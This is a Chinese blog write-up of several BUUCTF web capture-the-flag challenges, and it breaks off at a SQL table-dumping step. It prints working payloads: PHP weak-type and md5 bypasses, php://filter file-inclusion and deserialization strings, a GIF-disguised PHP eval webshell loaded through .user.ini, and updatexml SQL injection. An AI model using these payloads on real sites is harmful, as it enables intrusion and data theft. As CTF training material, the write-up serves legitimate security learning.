<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>buuctf-web(三) | 忆 执 昔 来 的 旅 途</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  <meta name="keywords" content="CTFWebBUUCTF" />
  
  
  
  
  <meta name="description" content="概述：本篇是 BUUCTF-WEB方向的第三篇，其中涵盖的范围较广，包括 SQL注入、序列化与反序列化、文件上传、数据库的特性、PHP弱类型、MD5碰撞以及相关漏洞、文件包含、PHP伪协议、SSRF。">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-WEB(三)">
<meta property="og:url" content="https://xizhi-future.github.io/2021/06/04/BUUCTF-WEB%EF%BC%88%E4%B8%89%EF%BC%89/index.html">
<meta property="og:site_name" content="忆 执 昔 来 的 旅 途">
<meta property="og:description" content="概述：本篇是 BUUCTF-WEB方向的第三篇，其中涵盖的范围较广，包括 SQL注入、序列化与反序列化、文件上传、数据库的特性、PHP弱类型、MD5碰撞以及相关漏洞、文件包含、PHP伪协议、SSRF。">
<meta property="og:locale">
<meta property="og:image" content="https://i.loli.net/2021/05/31/TVsQzJ6RigWrhln.png">
<meta property="og:image" content="https://i.loli.net/2021/05/31/yxHMGZlpJwrcACO.png">
<meta property="og:image" content="https://i.loli.net/2021/05/31/vaQwWDANFSdT5Ym.png">
<meta property="og:image" content="https://i.loli.net/2021/05/31/Cu7lH5XqZywLvTR.png">
<meta property="og:image" content="https://i.loli.net/2021/05/31/VPp2CY36rW1sxTy.png">
<meta property="og:image" content="https://i.loli.net/2021/05/31/P6j7sh4abvS835f.png">
<meta property="og:image" content="https://i.loli.net/2021/05/31/eqjmgdIaOPJYCpv.png">
<meta property="og:image" content="https://i.loli.net/2021/05/31/IUGQKkYATjqLol5.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/9SXFGKTMwWQBPnp.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/HVaToEjeKrO1s87.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/fA9jkCLe6SYQZWO.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/O8KnEHQfsTSg69w.png">
<meta property="og:image" content="https://i.loli.net/2021/06/04/dwPRmVWuDcf9U7F.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/Eq21rYC9czNxWkV.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/EJWYtcpiwO6dAIz.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/ayiD38FoxrjJnPw.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/YB9PSmUqflzEnOD.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/7GRX3Y2ZFA8sOdK.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/DcqRGnP48OB7kW9.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20190926181537561.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4NzY5NTUx,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20190926181516384.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4NzY5NTUx,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://i.loli.net/2021/06/01/SarOwucsEyQL8PV.png">
<meta property="og:image" content="https://i.loli.net/2021/06/01/6sDh3U58QaRtCTl.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/DcUtBaEnHfeZ4r1.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/EsPkAIi1b8wxFun.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/t7DXGFqH6nkJlIv.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/rKaZ9c7zAHe5gYO.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/rVuMiXmDPUAd13F.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/HFnVsyX2pSAMfkq.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/3OJiMp4G1CqBd7T.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/xwKheZdj2pUO6sa.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/yvMD6oPbEw514RG.png">
<meta property="article:published_time" content="2021-06-04T10:25:29.000Z">
<meta property="article:modified_time" content="2021-07-09T07:27:06.204Z">
<meta property="article:author" content="xizhi-future">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="BUUCTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/05/31/TVsQzJ6RigWrhln.png">
  
    <link rel="alternate" href="/atom.xml" title="忆 执 昔 来 的 旅 途" type="application/atom+xml">
  

  

  <link rel="icon" href="/css/images/mylogo.jpg">
  <link rel="apple-touch-icon" href="/css/images/mylogo.jpg">
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link href="https://fonts.googleapis.com/css?family=Open+Sans|Montserrat:700" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Roboto:400,300,300italic,400italic" rel="stylesheet" type="text/css">
  <link href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css" rel="stylesheet">
  <style type="text/css">
    @font-face{font-family:futura-pt; src:url("/css/fonts/FuturaPTBold.otf") format("woff");font-weight:500;font-style:normal;}
    @font-face{font-family:futura-pt-light; src:url("/css/fonts/FuturaPTBook.otf") format("woff");font-weight:lighter;font-style:normal;}
    @font-face{font-family:futura-pt-italic; src:url("/css/fonts/FuturaPTBookOblique.otf") format("woff");font-weight:400;font-style:italic;}
}

  </style>
  
<link rel="stylesheet" href="/css/style.css">


  
<script src="/js/jquery-3.1.1.min.js"></script>

  
<script src="/js/bootstrap.js"></script>


  <!-- Bootstrap core CSS -->
  <link rel="stylesheet" href="/css/bootstrap.css" >

  
    
<link rel="stylesheet" href="/css/dialog.css">

  

  

  
    <link rel="stylesheet" href="/css/header-post.css" >
  

  
  
  
    <link rel="stylesheet" href="/css/vdonate.css" >
  

<meta name="generator" content="Hexo 5.4.0"></head>



  <body data-spy="scroll" data-target="#toc" data-offset="50">


  
  <div id="container">
    <div id="wrap">
      
        <header>

    <div id="allheader" class="navbar navbar-default navbar-static-top" role="navigation">
        <div class="navbar-inner">
          
          <div class="container"> 
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
              <span class="sr-only">Toggle navigation</span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
            </button>

            
              <a class="brand" style="
                 margin-top: 0px;"  
                href="#" data-toggle="modal" data-target="#myModal" >
                  <img width="124px" height="124px" alt="Hike News" src="/css/images/mylogo.jpg">
              </a>
            
            
            <div class="navbar-collapse collapse">
              <ul class="hnav navbar-nav">
                
                  <li> <a class="main-nav-link" href="/">Home</a> </li>
                
                  <li> <a class="main-nav-link" href="/archives">Archives</a> </li>
                
                  <li> <a class="main-nav-link" href="/categories">Categories</a> </li>
                
                  <li> <a class="main-nav-link" href="/tags">Tags</a> </li>
                
                  <li> <a class="main-nav-link" href="/essayists">随笔</a> </li>
                
                  <li> <a class="main-nav-link" href="/friendly-links">友情链接</a> </li>
                
                  <li> <a class="main-nav-link" href="/about">About</a> </li>
                
                  <li><div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="Type something..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div></li>
            </div>
          </div>
                
      </div>
    </div>

</header>



      
            
      <div id="content" class="outer">
        
          <section id="main" style="float:none;"><article id="post-BUUCTF-WEB（三）" style="width: 75%; float:left;" class="article article-type-post" itemscope itemprop="blogPost" >
  <div id="articleInner" class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="thumb" class="article-title" itemprop="name">
      BUUCTF-WEB(三)
    </h1>
  

      </header>
    
    <div class="article-meta">
      
	<a href="/2021/06/04/BUUCTF-WEB%EF%BC%88%E4%B8%89%EF%BC%89/" class="article-date">
	  <time datetime="2021-06-04T10:25:29.000Z" itemprop="datePublished">2021-06-04</time>
	</a>

      
    <a class="article-category-link" href="/categories/CTF/">CTF</a>

      
	<a class="article-views">
	<span id="busuanzi_container_page_pv">
		PV:<span id="busuanzi_value_page_pv"></span>
	</span>
	</a>

      

    </div>
    <div class="article-entry" itemprop="articleBody">
      
        <p>概述：本篇是 BUUCTF-WEB方向的第三篇，其中涵盖的范围较广，包括 SQL注入、序列化与反序列化、文件上传、数据库的特性、PHP弱类型、MD5碰撞以及相关漏洞、文件包含、PHP伪协议、SSRF。</p>
<span id="more"></span>

<h1 id="一、-极客大挑战-2019-BuyFlag1"><a href="#一、-极客大挑战-2019-BuyFlag1" class="headerlink" title="一、[极客大挑战 2019]BuyFlag1"></a>一、[极客大挑战 2019]BuyFlag1</h1><p><strong>考点：PHP 弱类型、strcmp() 函数漏洞</strong></p>
<p>查看源码发现</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--</span><br><span class="line">	~~~post money <span class="keyword">and</span> password~~~</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>])) &#123;</span><br><span class="line">	<span class="variable">$password</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line">	<span class="keyword">if</span> (is_numeric(<span class="variable">$password</span>)) &#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;password can&#x27;t be number&lt;/br&gt;&quot;</span>;</span><br><span class="line">	&#125;<span class="keyword">elseif</span> (<span class="variable">$password</span> == <span class="number">404</span>) &#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;Password Right!&lt;/br&gt;&quot;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure>

<p>根据PHP的弱类型，直接构造 <code>money=100000000&amp;password=404a</code></p>
<p><img src="https://i.loli.net/2021/05/31/TVsQzJ6RigWrhln.png" alt="image-20210531125637405"></p>
<p>显而易见，要我们是cuit的身份才可以</p>
<p>抓包查看，存在 <code>user=0</code>，当然，直接进行修改 <code>user=1</code>，发现</p>
<p><img src="https://i.loli.net/2021/05/31/yxHMGZlpJwrcACO.png" alt="image-20210531130032820"></p>
<p>身份已经改变，然后我们post传入参数 password 和 money</p>
<p><img src="https://i.loli.net/2021/05/31/vaQwWDANFSdT5Ym.png" alt="image-20210531165811757"></p>
<p>提示我们 数字过长，我们可以使用科学计数法 <code>1e9</code> 或者是 <code>money[]=100000000</code></p>
<h1 id="二、-BJDCTF2020-Easy-MD51"><a href="#二、-BJDCTF2020-Easy-MD51" class="headerlink" title="二、[BJDCTF2020]Easy MD51"></a>二、[BJDCTF2020]Easy MD51</h1><p><strong>考点：md5($a,true) sql绕过、md5碰撞绕过、md5数组绕过</strong></p>
<p>输入什么都没有什么显示，抓包看看</p>
<p><img src="https://i.loli.net/2021/05/31/Cu7lH5XqZywLvTR.png" alt="image-20210531132204151"></p>
<p>发现提示 <code>select * from &#39;admin&#39; where password=md5($pass,true</code></p>
<p>网上查：造成md5()漏洞的值：<code>ffifdyop</code></p>
<p><img src="https://i.loli.net/2021/05/31/VPp2CY36rW1sxTy.png" alt="image-20210531132637388"></p>
<p>紧接着抓包，查看</p>
<p><img src="https://i.loli.net/2021/05/31/P6j7sh4abvS835f.png" alt="image-20210531132858878"></p>
<p>发现源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--</span><br><span class="line"><span class="variable">$a</span> = <span class="variable">$GET</span>[<span class="string">&#x27;a&#x27;</span>];</span><br><span class="line"><span class="variable">$b</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;b&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$a</span> != <span class="variable">$b</span> &amp;&amp; md5(<span class="variable">$a</span>) == md5(<span class="variable">$b</span>))&#123;</span><br><span class="line">    <span class="comment">// wow, glzjin wants a girl friend.</span></span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure>

<p>则构造</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?a=<span class="number">240610708</span>&amp;b=QNKCDZO</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/05/31/eqjmgdIaOPJYCpv.png" alt="image-20210531133422346"></p>
<p>源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;param1&#x27;</span>]!==<span class="variable">$_POST</span>[<span class="string">&#x27;param2&#x27;</span>]&amp;&amp;md5(<span class="variable">$_POST</span>[<span class="string">&#x27;param1&#x27;</span>])===md5(<span class="variable">$_POST</span>[<span class="string">&#x27;param2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>构造以下内容，得到 flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?param1[]=<span class="number">0</span>&amp;param2[]=<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/05/31/IUGQKkYATjqLol5.png" alt="image-20210531134355186"></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/apolloren/p/14139516.html">md5 碰撞</a></p>
<h2 id="2-1-总结：MD5-绕过-sql"><a href="#2-1-总结：MD5-绕过-sql" class="headerlink" title="2.1 总结：MD5 绕过 sql"></a>2.1 总结：MD5 绕过 sql</h2><ul>
<li><p><strong>md5 绕过 sql</strong> ：md5 和 sha1 支持第二个参数，如果为 true，则会将 hash 后的 16 进制字符串以 16 进制转成字符串的形式返回，如果在 SQL 语句中这样写，会存在注入的问题。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">提供一个字符串：ffifdyop，md5后，<span class="number">276</span>f722736c95d99e921722cf9ed621c</span><br><span class="line">再转成字符串：<span class="string">&#x27;or&#x27;</span><span class="number">6</span>É]™é<span class="operator">!</span>r,ùíb，即md5(<span class="string">&#x27;ffifdyop&#x27;</span>,<span class="literal">true</span>) <span class="operator">=</span><span class="string">&#x27;or&#x27;</span><span class="number">6</span>É]™é<span class="operator">!</span>r,ùíb</span><br><span class="line"></span><br><span class="line">  <span class="operator">/</span><span class="operator">/</span> 可以实现绕过</span><br><span class="line">  $password <span class="operator">=</span> &quot;ffifdyop&quot;;</span><br><span class="line">  $<span class="keyword">sql</span> <span class="operator">=</span> &quot;SELECT * FROM admin WHERE pass = &#x27;&quot;.md5($password,<span class="literal">true</span>).&quot;&#x27;&quot;;</span><br><span class="line">  var_dump($<span class="keyword">sql</span>);</span><br></pre></td></tr></table></figure></li>
</ul>
<h1 id="三、-ZJCTF-2019-NiZhuanSiWei1"><a href="#三、-ZJCTF-2019-NiZhuanSiWei1" class="headerlink" title="三、[ZJCTF 2019]NiZhuanSiWei1"></a>三、[ZJCTF 2019]NiZhuanSiWei1</h1><p><strong>考点：文件包含、php伪协议、序列化与反序列化</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">&quot;text&quot;</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_GET</span>[<span class="string">&quot;password&quot;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;welcome to the zjctf&quot;</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>).<span class="string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Not now!&quot;</span>;</span><br><span class="line">        <span class="keyword">exit</span>(); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$file</span>);  <span class="comment">//useless.php</span></span><br><span class="line">        <span class="variable">$password</span> = unserialize(<span class="variable">$password</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$password</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?text=data:<span class="comment">//test/plain,welcome to the zjctf</span></span><br><span class="line">或者是</span><br><span class="line">?text=data:<span class="comment">//test/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=</span></span><br></pre></td></tr></table></figure>

<p>file 参数不能含有 flag</p>
<p>构造</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?text=data:<span class="comment">//test/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&amp;file=php://filter/read=convert.base64-encode/resource=useless.php</span></span><br></pre></td></tr></table></figure>

<p>得到 useless.php的内容如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Flag</span></span>&#123;  <span class="comment">//flag.php  </span></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;  </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span>(<span class="params"></span>)</span>&#123;  </span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file))&#123;  </span><br><span class="line">            <span class="keyword">echo</span> file_get_contents(<span class="keyword">$this</span>-&gt;file); </span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> (<span class="string">&quot;U R SO CLOSE !///COME ON PLZ&quot;</span>);</span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="meta">?&gt;</span>  </span><br></pre></td></tr></table></figure>

<p><code>__tostring() 是在直接输出对象引用时自动调用的方法</code>，可以看到在源码最后对password这个变量进行了反序列化，然后进行输出，那么如果我们传入一个对象的话，在对象进行 <code>echo</code> 时就会调用 <code>__tostring()</code> 魔术方法，获取到 <code>$file</code> 中的内容。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> Flag();</span><br><span class="line"><span class="variable">$a</span>-&gt;file = <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="variable">$a</span>);</span><br></pre></td></tr></table></figure>

<p>得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:<span class="number">4</span>:<span class="string">&quot;Flag&quot;</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">&quot;file&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;flag.php&quot;</span>;&#125;</span><br></pre></td></tr></table></figure>

<p>最终的 payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?text=data:<span class="comment">//test/plain,welcome to the zjctf&amp;file=useless.php&amp;password=O:4:&quot;Flag&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;&#125;</span></span><br></pre></td></tr></table></figure>

<p>查看源码得到 flag</p>
<h1 id="四、-SUCTF-2019-CheckIn1"><a href="#四、-SUCTF-2019-CheckIn1" class="headerlink" title="四、[SUCTF 2019]CheckIn1"></a>四、[SUCTF 2019]CheckIn1</h1><p><strong>考点：文件上传、图片木马 过 &lt;?、.user.ini配置文件的使用</strong></p>
<ol>
<li>上传 <code>.php  .php2   .php3   .php5   .phtml</code>，发现不被允许</li>
<li>修改 <code>Content-Type</code>   , 发现不能包含 <code>&lt;?</code></li>
<li>修改文件内容 <code>&lt;script language=&quot;php&quot;&gt;@eval($_POST[111])&lt;/script&gt;</code>  ，返回 <code>exif_imagetype:not image!</code></li>
<li>在文件内容开头加上 <code>GIF89a</code>，得到上传路径，发现 非图片类型</li>
<li>访问不能用蚁剑连上</li>
<li>想到的解决办法：<code>.htaccess  .user.ini</code></li>
<li>区分：<ul>
<li><code>.htaccess</code> 是 Apache服务器的分布式配置文件，该配置文件会覆盖 Apache服务器的全局配置 <code>httpd-conf</code> ，只对该文件所在目录下的文件起作用</li>
<li><code>.user.ini</code> 是 PHP的目录配置文件（局部的），相当于用户自己定义的一个 <strong>php.ini</strong> 文件。不仅仅限于 Apache 服务器，还可以用于 Nginx , IIS 等服务器。</li>
</ul>
</li>
<li>查看该题目的服务器：<code>openresty</code><ul>
<li>OpenResty® 是一个成熟的网络平台，它集成了我们的 Nginx 核心增强版、LuaJIT 增强版、许多精心编写的 Lua 库、大量高质量的 3rd-party Nginx 模块以及它们的大部分外部依赖项。</li>
</ul>
</li>
<li>只能使用 <code>.user.ini</code> ，并且结合该方法的使用条件，该目录下必须含有 .php 文件，下面的图片中可以看到该题目中含有 <code>index.php</code> 文件</li>
</ol>
<p><strong>编写 .user.ini 文件并上传</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a                  </span><br><span class="line">auto_prepend_file=.hack_GIF_ma.gif </span><br></pre></td></tr></table></figure>

<p><strong>编写 hack_GIF_ma.gif 文件并上传</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Content-Type:image/gif</span><br><span class="line">文件名：hack_GIF_ma.gif</span><br><span class="line">文件内容：GIF89a&lt;script language=<span class="string">&quot;php&quot;</span>&gt;@<span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&quot;cmd&quot;</span>])&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/01/9SXFGKTMwWQBPnp.png" alt="image-20210601132745341"></p>
<p>可以看到给我们回显的内容是我们成功上传的文件路径，以及当前目录下的文件，发现 <code>index.php</code> </p>
<ol start="10">
<li>访问 <code>index.php</code> </li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/uploads/<span class="number">79</span>d126728819a4f553622db4444bccf9/index.php?cmd=var_dump(scandir(<span class="string">&#x27;/&#x27;</span>));</span><br><span class="line"></span><br><span class="line">/uploads/<span class="number">79</span>d126728819a4f553622db4444bccf9/index.php?cmd=system(<span class="string">&#x27;cat /flag&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/06/01/HVaToEjeKrO1s87.png" alt="image-20210601133437528"></p>
<p><img src="https://i.loli.net/2021/06/01/fA9jkCLe6SYQZWO.png" alt="image-20210601133529090"></p>
<h2 id="4-1-总结：检查是否是图片-函数"><a href="#4-1-总结：检查是否是图片-函数" class="headerlink" title="4.1 总结：检查是否是图片 函数"></a>4.1 总结：检查是否是图片 函数</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">exif_imagetype ( <span class="keyword">string</span> <span class="variable">$filename</span> ) : <span class="keyword">int</span> </span><br><span class="line">   <span class="number">1</span>. 判断一个图像的类型</span><br><span class="line">   <span class="number">2</span>. 读取一个图像的第一个字节并检查其签名。</span><br><span class="line">   <span class="number">3</span>. 如果发现了恰当的签名则返回一个对应的预定义常量，否则返回 <span class="literal">false</span>。 </span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">getimagesize ( <span class="keyword">string</span> <span class="variable">$filename</span> , <span class="keyword">array</span> &amp;<span class="variable">$imageinfo</span> = ? ) : <span class="keyword">array</span> — 取得图像大小</span><br><span class="line">   <span class="number">1</span>. 函数将测定任何 GIF，JPG，PNG，SWF，SWC，PSD，TIFF，BMP，IFF，JP2，JPX，JB2，JPC，XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串</span><br><span class="line">   <span class="number">2</span>. 如果不能访问 filename 指定的图像或者其不是有效的图像，getimagesize() 将返回 <span class="literal">false</span> 并产生一条 E_WARNING 级的错误。   </span><br></pre></td></tr></table></figure>

<h1 id="五、-极客大挑战-2019-HardSQL1"><a href="#五、-极客大挑战-2019-HardSQL1" class="headerlink" title="五、[极客大挑战 2019]HardSQL1"></a>五、[极客大挑战 2019]HardSQL1</h1><p><strong>考点：SQL 注入 之 绕 = ，回显不完全</strong></p>
<p><strong>暴库：</strong></p>
<p><code>空格、and、#、--+、&amp;&amp;、select、union、order、by、|</code> 等 都被过滤掉了，但是没有过滤掉 or，并且有报错，字符型注入，单引号闭合</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">a<span class="string">&#x27;or(updatexml(1,concat(0x7e,database(),0x7e),1))or&#x27;</span></span><br><span class="line">a<span class="string">&#x27; or updatexml(1,concat(0x7e,database(),0x7e),1) or&#x27;</span></span><br><span class="line"><span class="comment"># 数据库 geek</span></span><br></pre></td></tr></table></figure>

<p><strong>暴表：过滤 空格、=</strong></p>
